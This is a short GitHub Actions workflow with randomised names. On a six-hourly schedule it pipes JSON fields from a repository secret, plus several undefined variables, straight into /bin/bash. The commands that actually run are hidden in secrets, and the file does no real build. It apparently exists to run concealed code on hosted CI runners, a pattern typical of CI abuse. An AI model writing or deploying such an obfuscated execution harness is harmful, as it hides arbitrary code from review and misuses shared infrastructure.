name: kitdepict

on:
  workflow_dispatch:
  schedule:
    - cron: '35 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kitdepict
        env:
          yd07: ${{ secrets.yd07 }}
        run: |
          echo $yd07 | jq -r .k096 | /bin/bash
          echo $fwejs5 | jq -r .nnz877 | /bin/bash
          echo $ztkk47 | jq -r .fuut809 | /bin/bash
          echo $fxvl5 | jq -r .z8303 | /bin/bash
          echo $ozzy4 | jq -r .qkiuw7038 | /bin/bash
          echo $xsdx0 | jq -r .tfmnc667 | /bin/bash
          echo $rd57 | jq -r .qbm590 | /bin/bash

